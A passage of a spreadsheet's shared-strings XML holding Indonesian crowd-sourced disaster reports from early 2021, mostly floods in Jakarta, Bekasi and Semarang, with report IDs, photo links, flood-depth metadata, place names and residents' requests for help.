  </si>
  <si>
    <t>ccf2a227-618d-44c2-a8f5-f31abb9d3e08</t>
  </si>
  <si>
    <t>surutnya banjir yg terlama dalam sejarah banjir di perumahan saya?????? hujan reda dr jam 6 pagi kemarin tp air baru surut jam 22.00????</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/iwzFAmgfIQm92VPU664oMJW5CwUO7A4U8-pffhCqUMiPyVrg6xEjCWJh4IfJ1aHjGLfBdVm-R29PjVSOwfQFEI61L2SagneVpFMPbKoM-Q=s480-c</t>
  </si>
  <si>
    <t>hari kedua dan masih belum surut</t>
  </si>
  <si>
    <t>560024f6-b1f1-4a93-a098-ea078caf2d34</t>
  </si>
  <si>
    <t>Banjir luapan air sungai citarum</t>
  </si>
  <si>
    <t>3434df7e-9210-4f3e-8095-214b696f9f26</t>
  </si>
  <si>
    <t>Banjir dri kemarin sore malah makin naik</t>
  </si>
  <si>
    <t>894a5dd7-ac72-431a-9d10-590e2376e962</t>
  </si>
  <si>
    <t>https://images.petabencana.id/894a5dd7-ac72-431a-9d10-590e2376e962.jpg</t>
  </si>
  <si>
    <t xml:space="preserve">Air di sekitar aliran sungai di perumahan taman kintamani jejalen Jaya tambun utara kab bekasi. </t>
  </si>
  <si>
    <t>Jalenjaya</t>
  </si>
  <si>
    <t>408d8ac8-acb6-4b09-b9ae-6eba8f988a9d</t>
  </si>
  <si>
    <t>Air setinggi betis.</t>
  </si>
  <si>
    <t>a6771c95-0f01-422c-953a-f591a042ef00</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/vZEkCkl7ra_brdDI8u9c7cn2YuktJjOgx3F1UwNuXWTPwJzaqWtY8HfOrHUpCQ0WxAQac5MSqTinqdRhYSMPg9aVMFZXsy5PLnrGb3n3=s480-c</t>
  </si>
  <si>
    <t>SDH 2 hari ketinggian sedengkul orang dewasa,blm ada bantuan dan penanganan soal banjir dr pihak2 terkait. tolong diperhatikan yg kebanjiran pemerintah kabupaten Bekasi. perum cahaya Darussalam 2 tambun desa jejalen jaya"</t>
  </si>
  <si>
    <t>c211def4-d26b-4a5a-b147-7524fe0e0ffe</t>
  </si>
  <si>
    <t>Air hampir mencapai dengkul.</t>
  </si>
  <si>
    <t>7a8579e0-f652-479b-9b49-fd0abfe453a8</t>
  </si>
  <si>
    <t>Tinggi air sebetis</t>
  </si>
  <si>
    <t>d5cab71c-738f-47f2-95cc-b52339fbe0cb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d5cab71c-738f-47f2-95cc-b52339fbe0cb.jpg</t>
  </si>
  <si>
    <t>Banjir semakin tinggi sudah 1m</t>
  </si>
  <si>
    <t>526afaca-fa9a-4077-9cdb-f3c56f293149</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2391", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tinggi air hampir sebetis</t>
  </si>
  <si>
    <t>47b98173-ccd4-41f3-b915-4ac09fa3fffb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/47b98173-ccd4-41f3-b915-4ac09fa3fffb.jpg</t>
  </si>
  <si>
    <t>Banjir di wilayah Rt 016/04, Kel Rawa Buaya, Kec  Cengkareng, Jakarta Barat</t>
  </si>
  <si>
    <t>1e430782-1800-4d72-8f2a-89e09a3b00e8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1e430782-1800-4d72-8f2a-89e09a3b00e8.jpg</t>
  </si>
  <si>
    <t>Banjir terjadi Sabtu 20 feebruari 2021, baru bisa dilaporkan keesokan harinya dikarenakan sinyal internet ikut terganggu pd saat banjir</t>
  </si>
  <si>
    <t>2c0f92af-7fe2-4ad2-a8e2-912d61c88cd8</t>
  </si>
  <si>
    <t>Banjir menutup akses jalan ,</t>
  </si>
  <si>
    <t>0cf3eb0e-4e49-4b58-bb70-ab54676f7890</t>
  </si>
  <si>
    <t>e182275a-7bb9-442e-822a-c42f79abb8d3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e182275a-7bb9-442e-822a-c42f79abb8d3.jpg</t>
  </si>
  <si>
    <t>banjir di desa pesanggrahan kec wiradesa kab pekalongan membuat desa di sekitarnya menjadi kebanjiran</t>
  </si>
  <si>
    <t>Bener</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/gG63bMuUrMCYVrIthgjQo1y13PaPXAfR7l8oUUnJeBN3QqXCWJraofbLRKpXjOTPGSLemkkGeOzjo6JstY5F3Z57uLpzQBotIkRqzVjysQ=s480-c</t>
  </si>
  <si>
    <t>banjirr</t>
  </si>
  <si>
    <t>0449400a-2f43-49bf-803a-d51ffadc1dcb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0449400a-2f43-49bf-803a-d51ffadc1dcb.jpg</t>
  </si>
  <si>
    <t>Banjir di Komplek Rumah Galindra, Canadianti, Liliana dan Puskesmas Kel. Mampang Perapatan, Prapanca Bawah, Jakarta Selatan (Kali Krukut)</t>
  </si>
  <si>
    <t>46aa88f7-f08f-40de-8020-0592b4f27e60</t>
  </si>
  <si>
    <t>https://images.petabencana.id/46aa88f7-f08f-40de-8020-0592b4f27e60.jpg</t>
  </si>
  <si>
    <t>Terjebak banjir sejak 20 februari. Orang tuaku dan banyak orang lainnya terjebak di atas jembatan di lemah abang ke arah karawang.</t>
  </si>
  <si>
    <t>Lemah Abang</t>
  </si>
  <si>
    <t>bad7f510-c432-45cd-97c5-f2c6b713b357</t>
  </si>
  <si>
    <t>Banjir terjadi sejak 20 februari 2021 , pukul 5.00 WIB - sekarang.</t>
  </si>
  <si>
    <t>109984ff-e6d9-40bf-8393-dfed81824f05</t>
  </si>
  <si>
    <t>Banjir di blok N dan perum mutiara gading timur kelurahan mustika jaya kecamatan mustika jaya kota bekasi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Zi-f5ssg9O0wOjkTc49pa7MYG_Uiy7kt6Wqq97E7Y3NLfo47tkJ8V-3sBvACOQn8ZkT1DEfw6TFFNcGxj21TOPNboDjFyMGU_6_slb9VPD4=s480-c</t>
  </si>
  <si>
    <t>#BanjirBandang #BanjirKiriman fasilitas jalan,tembok jebol efek banjir besar. team terkait segera bergerak</t>
  </si>
  <si>
    <t>5e51ffae-a3db-4ded-b88e-22da123f9601</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5e51ffae-a3db-4ded-b88e-22da123f9601.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 87, "report_type": "flood" }</t>
  </si>
  <si>
    <t>10 orangterjebak di truk dekat SPBU 34-17540 MARELENG SPBU"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Hee3orDGjaMBm2UJLL7cK7sQJ6ydvWjmnf5nGDnEdwCBiFk-kf_PrcB-tEpekzpiaQwxhJCpOpwI_KPqr2rkYMdLXeBDbA-i2q-sCY5qhQ=s480-c</t>
  </si>
  <si>
    <t>tolong diperhatikan buat pihak2 terkait yg msh tergenang banjir msh setinggi dengkul orang dewasa,blm tersentuh bantuan apapun SDH 2hari kondisi seperti ini</t>
  </si>
  <si>
    <t>41b08d8d-621a-4bf9-a256-e360b8fc73e4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/41b08d8d-621a-4bf9-a256-e360b8fc73e4.jpg</t>
  </si>
  <si>
    <t>Baru pagi ini tgl 21Feb banjir nya</t>
  </si>
  <si>
    <t>305cf894-1f89-4f0a-bb7e-f25d9eedbc25</t>
  </si>
  <si>
    <t>https://images.petabencana.id/305cf894-1f89-4f0a-bb7e-f25d9eedbc25.jpg</t>
  </si>
  <si>
    <t>Foto diambil pada Minggu 08.00 21 feb 2021</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/FHu-8TLM5JcOZc765l3pvRm9p5k79gx5eCZrIIADj84cMWpqbLuEJihBZInNWJJabDWcHzLHic2q4m-7rhZwM-jPysguwMoM8ApUiMz8-g=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil #tolong di pantau warga yg terdampak banjir</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/78HzrdnybT0wy59DPUpYc3658ziT3k3Z-MLhVd9KX6cqRAgjg8S7SKZFztDQPRmIj35PI_EnCcLITGmsTH10zhtkCfE9-KAwudkhikCv=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap tolong di cek warga yg  terdampak banjir</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/lWE10GoyCv0pTGJdqoHowcW25G4PtRLDqB_9CReetVpPsUxa0cD-CMYCjl91wA0J8bXKk8ycHZYGTymDKbAkG2QXKGurmDlHnJNaLnCW=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap liat warga yg terdampak banjir</t>
  </si>
  <si>
    <t>5a2915f9-e582-453f-b773-1638cd43227c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5a2915f9-e582-453f-b773-1638cd43227c.jpg</t>
  </si>
  <si>
    <t>Senggi</t>
  </si>
  <si>
    <t>Keerom</t>
  </si>
  <si>
    <t>2c33416e-8e0c-4ab4-b258-1a34df5d203a</t>
  </si>
  <si>
    <t>Banjir komplek Ciputat baru</t>
  </si>
  <si>
    <t>c5a72443-95d8-4271-998b-1e5864a3401f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c5a72443-95d8-4271-998b-1e5864a3401f.jpg</t>
  </si>
  <si>
    <t>Banjir dan mati lampu dari kemarin. Mohon bantuan untuk di pompa airnya</t>
  </si>
  <si>
    <t>75484d62-6b53-4472-bb28-bf7daf6264b7</t>
  </si>
  <si>
    <t>Banjir diperumahan Karaba.. karawang barat.. luapan sungai Citarum</t>
  </si>
  <si>
    <t>Wadas</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/OGB9o06_YjEQ2cwXHumMGx4F3xcvOVRgyQFD0mKUjHFw1Zkr8WMAPRPAOG2YOCVcxOAXmmVrqwaU5r1WLLET7fszp6ZNKyxMAFR2beuL=s480-c</t>
  </si>
  <si>
    <t>Selamat Siang Pemda DKI kami di Taman Permata Buana Jalan Pulau Putri dan Buana Biru Besar II banjirnya ga surut? nih dari hari Jumat lalu pdhal kemaren dan hari ini mataharinya terik. Tolong dong Pak. Terima kasih. #BanjirKiriman"</t>
  </si>
  <si>
    <t>0c6ad8b9-9e49-4e4d-855f-59f0a4f6de83</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0c6ad8b9-9e49-4e4d-855f-59f0a4f6de83.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 52, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di Duri Kosambi Cengkareng Jakarta Barat</t>
  </si>
  <si>
    <t>f5b5a67f-ad19-4b3c-b990-bbc1532aef00</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f5b5a67f-ad19-4b3c-b990-bbc1532aef00.jpg</t>
  </si>
  <si>
    <t>ea0a1f4a-1bd6-4714-830c-c36301ed1fac</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ea0a1f4a-1bd6-4714-830c-c36301ed1fac.jpg</t>
  </si>
  <si>
    <t>Banjir sudah berlangsung 3 hari, di perumahan mutiara indah (pmi) dan grand permata resident(gpr)</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/QA9NQPkujlAOAsw8XvbW_uQ90Kn66eUMrb3l4pFhUGTIz8rdrOozGWRpcbJS1K9qGAwQNDiZ_qf-Ej_nXyWgCkENRZdIO4lKvi3WRRXRZw=s480-c</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/7rCmTvRUIngtbw1BdDZS8XPfTlEt0O4b1ovjADRoY0xrOLtWWlGQFPzBj6mVvWwpjot7XpkArXgPnhR4zXv18RfAappxP4dN6_-KadAuXYs=s480-c</t>
  </si>
  <si>
    <t>#BanjirKiriman</t>
  </si>
  <si>
    <t>ce3c1ac9-c8ad-4540-971e-467c30a54b8f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ce3c1ac9-c8ad-4540-971e-467c30a54b8f.jpg</t>
  </si>
  <si>
    <t>Perumaha villa mutiara jaya  Desa wanajaya Kecamatan Cibitung Kabupaten Bekasi</t>
  </si>
  <si>
    <t>c6ff7025-ab7c-4ecf-b7f0-fcb771812d8e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c6ff7025-ab7c-4ecf-b7f0-fcb771812d8e.jpg</t>
  </si>
  <si>
    <t>Banjir ciledug</t>
  </si>
  <si>
    <t>3083d467-98dc-4cca-9657-e6a6a63b3390</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3083d467-98dc-4cca-9657-e6a6a63b3390.jpg</t>
  </si>
  <si>
    <t>Butuh bantuan di desa cabang 4, bekasi jawa barat Keadaan air terus naik kemarin 22 februari 2021"</t>
  </si>
  <si>
    <t>Huripjaya</t>
  </si>
  <si>
    <t>756539f4-4b54-47cb-a017-2f667945caa4</t>
  </si>
  <si>
    <t>Alhamdulillah banjir surut dalam waktu 5 jam dan tidak terlalu tinggi seperti tahun lalu.</t>
  </si>
  <si>
    <t>Larangan Selatan</t>
  </si>
  <si>
    <t>44ea3c27-44c6-4ade-857a-9c8773dd0eda</t>
  </si>
  <si>
    <t>https://images.petabencana.id/44ea3c27-44c6-4ade-857a-9c8773dd0eda.jpg</t>
  </si>
  <si>
    <t>Banjir di Kp. Kramat Jl. Kesejahteraan Kecamatan Cikarang Utara, warga minta dievakusi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/3M8uavz010alPvpxjyFIFZ9gxq3U1pgrBoLLm-YZTV5hvCv6ZzliRhI_-3eE9JvULTt6O6zSMsIRlSmxuRFdKgITzW8xg12WFW8yXG9Geg=s480-c</t>
  </si>
  <si>
    <t>selamat pagi kepada gubernur bapak Anies yg terhormat. tolong segera ditindak lanjuti kepada pemimpiin  RW yg tidak punya perikemanusiaan atas warga nya yg terkena banjir. malah para warga yg terkena banjir dibilang sama beliau. karna disini saat baran"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/xEKzyNviHgK-s6txM9OXKmZPAdyVNuS-pPVSa2vKQMPdBjfy1Z3c2Di-p19OOGCKa1s12dXwwxH_mtzEB9ZR9xJHYdxmg--HUFouwXVK6g=s480-c</t>
  </si>
  <si>
    <t>tolong pak TL itu kuburan  apa empang</t>
  </si>
  <si>
    <t>f3474637-ecda-4b1a-9c2d-55356e40ccf8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f3474637-ecda-4b1a-9c2d-55356e40ccf8.jpg</t>
  </si>
  <si>
    <t>Banjir kiriman, Tolong bantuannya untuk desa cabang 4 bekasi utara"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/3iQlT_jGLy2pr8g2a3BuW0wx206rA_oBSi1GkccPgvgsZLxFCuuceUSgcft0HerruUURRkjyO_TZUCPvYSKUj6sJIGeWG3i_qmttWhM=s480-c</t>
  </si>
  <si>
    <t>tolong di tindak lanjuti.karena bisa membuat banjir.lokasi palem selatan . RT 09/07</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/v2xSOqiWplMsKlDCkoVgeOiMNJLO2luAHNDTT3FaC0jcrWFVezQLftAFuGjXOufzDtssYwP1p_toCo7poGJwZx8AxQgpo28HWIKidWEpuQ=s480-c</t>
  </si>
  <si>
    <t>tolong segera di TL.busa membuat banjir</t>
  </si>
  <si>
    <t>00725d57-65a4-4b22-874e-b796c0de8073</t>
  </si>
  <si>
    <t>https://images.petabencana.id/00725d57-65a4-4b22-874e-b796c0de8073.jpg</t>
  </si>
  <si>
    <t>Terjadi banjir pada sabtu, 20 februari 2021 di jl bali rotan, cikiwul, bantargebang, dan pada saat ini banjir telah surut</t>
  </si>
  <si>
    <t>Cikiwul</t>
  </si>
  <si>
    <t>7ec031ee-07af-4569-9f0a-16b5f8c4cf88</t>
  </si>
  <si>
    <t>{ "report_type": "road", "accessabilityFailure": 4, "condition": 0 }</t>
  </si>
  <si>
    <t>Terjadi gempa di palu, berpusat di buol, central sulawesi</t>
  </si>
  <si>
    <t>Lamadong 1</t>
  </si>
  <si>
    <t>Momunu</t>
  </si>
  <si>
    <t>Buol</t>
  </si>
  <si>
    <t>9c6a45ed-ad46-4ee0-ae64-0aab7cd1ee24</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9c6a45ed-ad46-4ee0-ae64-0aab7cd1ee24.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "645", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Bissmillah, saya telah dilatih oleh guru tentang banjir yang ada di Jakarta Pusat daerah Menteng.</t>
  </si>
  <si>
    <t>955e6c6b-7fdd-48b1-a3c3-f0d69fc378c9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/955e6c6b-7fdd-48b1-a3c3-f0d69fc378c9.jpg</t>
  </si>
  <si>
    <t>mohon bantuannya sebelum bertambah parah.. jl.swadaya 1A rt.10/rw.09 no.14 pejaten timur pasar minggu"</t>
  </si>
  <si>
    <t>b2857644-839f-47fa-b3cf-ec4815da33eb</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/43D_HRBlfIM9UR0CTkSy-vYQ-GoDs9M-fADTGgMEmgogElZFL0vn_rPQsXw_L9mzeFHEKbSorSCG-H5y0WiaoNgT-MrT4D4fJkpMqoFA=s480-c</t>
  </si>
  <si>
    <t>797e16ce-c24d-41ff-a2f6-1b7e9cc53fee</t>
  </si>
  <si>
    <t>https://images.petabencana.id/797e16ce-c24d-41ff-a2f6-1b7e9cc53fee.jpg</t>
  </si>
  <si>
    <t>baru 15 menit tp air sdh semata kaki. hujannya deras sekali dan sdh menggenang dimana2. di belakang air sdh masuk rumah2</t>
  </si>
  <si>
    <t>9ce5c89c-7440-4a2a-9b4b-95a4d4f52e0c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9ce5c89c-7440-4a2a-9b4b-95a4d4f52e0c.jpg</t>
  </si>
  <si>
    <t>Yahim</t>
  </si>
  <si>
    <t>Sentani</t>
  </si>
  <si>
    <t>Jayapura</t>
  </si>
  <si>
    <t>93f3e979-b63e-4e64-87e0-417178bf65a0</t>
  </si>
  <si>
    <t>{ "report_type": "road", "accessabilityFailure": 3, "condition": 1 }</t>
  </si>
  <si>
    <t>a</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/358049</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/02/23/1614064269281572.jpg</t>
  </si>
  <si>
    <t>Ngeri! Korban Banjir Kedungwaringin Mengungsi di Rel Kereta</t>
  </si>
  <si>
    <t>Korban banjir di Kedungwaringin,Bekasi masih mengungsi di rel kereta api. Pengungsian ini berada tidak jauh dari stasiun kedungdedeh Bekasi. Terlihat para pengungi menjemur barang-barang yang terkena banjir.</t>
  </si>
  <si>
    <t>Kedungwaringin</t>
  </si>
  <si>
    <t>4c42084e-7962-4909-aa1a-cffe6e389e75</t>
  </si>
  <si>
    <t>sada</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/358051</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/02/23/1614067152565903446.jpg</t>
  </si>
  <si>
    <t>Antisipasi Hanyut, Sebuah Mobil Diikat di Rel Kereta</t>
  </si>
  <si>
    <t>Mobil terlihat masih di ikat ke rel kereta supaya tidak hanyut. Korban banjir di Kedungwaringin,Bekasi.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/358052</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/02/23/1614067224295607772.jpg</t>
  </si>
  <si>
    <t>Imbas Banjir di Kedungwaringin, Area Sawah Rusak Parah</t>
  </si>
  <si>
    <t>Imbas banjir di Kedungwaringin,Bekasi area pesawahan terlihat rusak parah. Para petani menderita kerugian banyak.</t>
  </si>
  <si>
    <t>3bc1bd87-33f3-4ef1-a1fe-e823c116a436</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3102", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Daerah peleburan banjir sekitar 50cm yang pake motor matic tidak disarankan lewat karena pasti mogok</t>
  </si>
  <si>
    <t>Wonodri</t>
  </si>
  <si>
    <t>Semarang Selatan</t>
  </si>
  <si>
    <t>784d9bb4-490e-49a3-bee7-6ae8249555ff</t>
  </si>
  <si>
    <t>https://images.petabencana.id/784d9bb4-490e-49a3-bee7-6ae8249555ff.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3077", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>b7c0d146-33b8-403c-9f70-ce9bd7d1f309</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b7c0d146-33b8-403c-9f70-ce9bd7d1f309.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3073", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Untuk wilayah semarang bawah cari jalan yg aman</t>
  </si>
  <si>
    <t>Rejomulyo</t>
  </si>
  <si>
    <t>5393ca2c-369e-44e9-9b6f-145fe282e1a8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5393ca2c-369e-44e9-9b6f-145fe282e1a8.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "2779", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>banjir mulai jam 4 dan air surut jam 11, banjir setinggi 30cm</t>
  </si>
  <si>
    <t>0f2cb402-7167-42b2-a315-b3c3afef5abe</t>
  </si>
  <si>
    <t>Banjir setengah ban motor..</t>
  </si>
  <si>
    <t>f09b8b6b-058b-4dfe-a7a5-812e21841510</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f09b8b6b-058b-4dfe-a7a5-812e21841510.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "2796", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>jalan gajah tepatnya dr arah mejit agung ke arteri. banjir dan arus lumayan deras.</t>
  </si>
  <si>
    <t>Siwalan</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/358063</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/02/24/16141375201506700914.jpg</t>
  </si>
  <si>
    <t>Alhamdulillah! Perum Pondok Gede Permai Sudah Kering</t>
  </si>
  <si>
    <t>Pantauan pagi ini, alhamdulillah Perum Pondok Gede Permai Bekasi sudah kering.</t>
  </si>
  <si>
    <t>41cd7e78-4807-4a4c-bc58-f93eb9efab83</t>
  </si>
  <si>
    <t>Sekarang kayaknya sih udah enggak wkwk</t>
  </si>
  <si>
    <t>ab099488-7fe5-42a0-93e2-ab478259759a</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3321", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>genangan air masih lumayan tinggi dan blm surut. karena itu jalan yg sering dilewati untuk pekerja yang berasal dari luar kota semarang.</t>
  </si>
  <si>
    <t>82e147b0-abff-44c4-9726-e5281bc3c003</t>
  </si>
  <si>
    <t>https://images.petabencana.id/82e147b0-abff-44c4-9726-e5281bc3c003.jpg</t>
  </si>
  <si>
    <t>24/2/2021. Dapur Umum Bencana Banjir Bandang di ds. Sumber Rejo Kec. Donorojo Kab. Jepara… #pramukapeduli #kwarcabjepara"</t>
  </si>
  <si>
    <t>Puncel</t>
  </si>
  <si>
    <t>Dukuhseti</t>
  </si>
  <si>
    <t>c09517c0-94fd-4e91-a22f-51d6153efd8c</t>
  </si>
  <si>
    <t>{ "impact": 1, "points": 1, "report_type": "wind" }</t>
  </si>
  <si>
    <t>Angin kencang disertai hujan lebat.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/mo0P_CKJtmetuzkT2rqSeQ90qq-iHKdXXdCCbwFkwsxhCDH6MLzwfubJQO1IvUS3q_Cacgl_kQSeWFMTayTQhMXi29r7o-puBFENPBjlIw=s480-c</t>
  </si>
  <si>
    <t>Saluran airnya saja malah ditutup !</t>
  </si>
  <si>
    <t>f39c87ea-60bf-415f-a81d-c3a270716a04</t>
  </si>
  <si>
    <t>Dari arah ring road ke utara yang paling parah</t>
  </si>
  <si>
    <t>Maguwoharjo</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/358118</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/02/26/358118-161433546774345810.mp4-03.jpg</t>
  </si>
  <si>
    <t>Aliran Air Hujan di Jl Mrican Baru Kerap Bahayakan Pemotor</t>
  </si>
  <si>
    <t>Setiap hujan Jalan Mrican Baru Catur Tunggal Yogyakarta selalu menjadi aliran sungai, para pengendara harap hati hati terutama motor karena sering banyak yang terjatuh karena aliran air yang deras. Mohon perhatian Pemda setempat untuk dibuatkan selokan/g</t>
  </si>
  <si>
    <t>4b6cbc25-d190-4b8e-a422-447058a02e5f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4b6cbc25-d190-4b8e-a422-447058a02e5f.jpg</t>
  </si>
  <si>
    <t>Mohon untuk di daerah sempaja buat tingkat pembatalan di hapus kan</t>
  </si>
  <si>
    <t>bbf679d0-3c0a-4cd5-a580-0af48a720760</t>
  </si>
  <si>
    <t>Tidak dapat dilewati</t>
  </si>
  <si>
    <t>Ulu Benteng</t>
  </si>
  <si>
    <t>Marabahan</t>
  </si>
  <si>
    <t>89d00e95-4546-4f72-b17c-db8ae003d217</t>
  </si>
  <si>
    <t>https://images.petabencana.id/89d00e95-4546-4f72-b17c-db8ae003d217.jpg</t>
  </si>
  <si>
    <t>Banjir dikarnakan Tanggul yang jebol ...</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/qFUH_N6bcV7cDa2Wm8MFNSaWavM3_VGc1LQr1fjak3JwwO2ymOE_GEWFgFYY1vgc-ApXAlheGp9yz2_HbifMv2Xvn4wZgGv1WF9rh_-fzw=s480-c</t>
  </si>
  <si>
    <t>Gundukan sampah ini ada di jalan arimbi RT 02 RW 07, kel tn tinggj, kec Johor Baru..diatas saluran air. sehinggga berpotensi penyebab banjir.</t>
  </si>
  <si>
    <t>9fa7359b-469f-4e59-b720-da4a51351cef</t>
  </si>
  <si>
    <t>Got di gang saya sudah lama tidak di bersihkan dan adanya kelalaian dari tukang yang merenovasi rumah saya sehingga air masih masuk</t>
  </si>
  <si>
    <t>Kapasmadya Baru</t>
  </si>
  <si>
    <t>Tambaksari</t>
  </si>
  <si>
    <t>270aec88-afb9-48f0-817a-fa093f7cc0c6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/270aec88-afb9-48f0-817a-fa093f7cc0c6.jpg</t>
  </si>
  <si>
    <t>Banjir karena ada penyempitan saluran air biasaanya tidak sampai lama   seperti sekarang biasanya cepat surut</t>
  </si>
  <si>
    <t>Peguyangan Kangin</t>
  </si>
  <si>
    <t>Denpasar Utara</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/DBA9BZFqYHTkHPc5KyYaDmlOcouKrPLW-07DFuwpaQUGm4CDs-o1oc_n625Xdq6RFrN5N8crCq8FjR6Zjl9Kbt6AoTkZAajanzCdrhOAhg=s480-c</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/358204</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/03/04/358204-16148368871401834263.mp4-03.jpg</t>
  </si>
  <si>
    <t>Jalan Sidikalang-Parongil Terputus Imbas Banjir Bandang</t>
  </si>
  <si>
    <t>Jalan Sidikalang-Parongil putus karena banjir bandang. Mobil dan motor terpaksa memutar melalui Juma Teguh. Rumah yg berada tepat di atas jalur terancam longsor. Pemerintah Kabupaten Dairi diharapkan memperhatikan lokasi titik rawan banjir dan longsor. P</t>
  </si>
  <si>
    <t>Kota Sidikalang</t>
  </si>
  <si>
    <t>Sidikalang</t>
  </si>
  <si>
    <t>Dairi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/KIRtfRNOKMaW-gpqhyHoHkcHvRgbNsk3sth36GtTeIt6tlChEfxFiXyaoF0HxFg8uo-ogK0j0dHzoRCA6Jz2rjZxWl-ewUE0m3TZi3NWH50=s480-c</t>
  </si>
  <si>
    <t>Sampah berserakan, tolong dibersihkan</t>
  </si>
  <si>
    <t>8484d28d-4e0a-416b-9935-774c35fb0768</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8484d28d-4e0a-416b-9935-774c35fb0768.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1136", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Angin kencang di sertai hujan rintik" yg cukup jalan harus berhati hati ya hindari lubang dan genangan air jalan untuk kendaraan di harapkan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ueAEg0mrldTqJUfY0S2K0DY1Ji4o-XwSw6JS-3-dyftum9rHIurEkuxanqh7y_h6QsRYq_d3Da_T0Q-47aR_aiokrc81NwkVNoTBkW2Z=s480-c</t>
  </si>
  <si>
    <t>Sampah di pindahkan bukan di bersihkan atau di buang cuma jarak 5 mtr dari yg kemarin komplain. Bayangkan... kesana hanya kerjanya pindahkan sampah</t>
  </si>
  <si>
    <t>f9af53da-8565-44af-aa95-c17dec195a27</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f9af53da-8565-44af-aa95-c17dec195a27.jpg</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/pJYNdgc6P_xSbDbqJBYz8zTcvWLaOX5coSjp6lCR37G7H1457frpYGQVM1eVN3eFc5HBrZuab_eCDIqc2VmtvkMZPLZOk-7Q3p9iWES_iw=s480-c</t>
  </si>
  <si>
    <t>mhon kepada dinas yang terkait supaya bisa di atasi segera.</t>
  </si>
  <si>
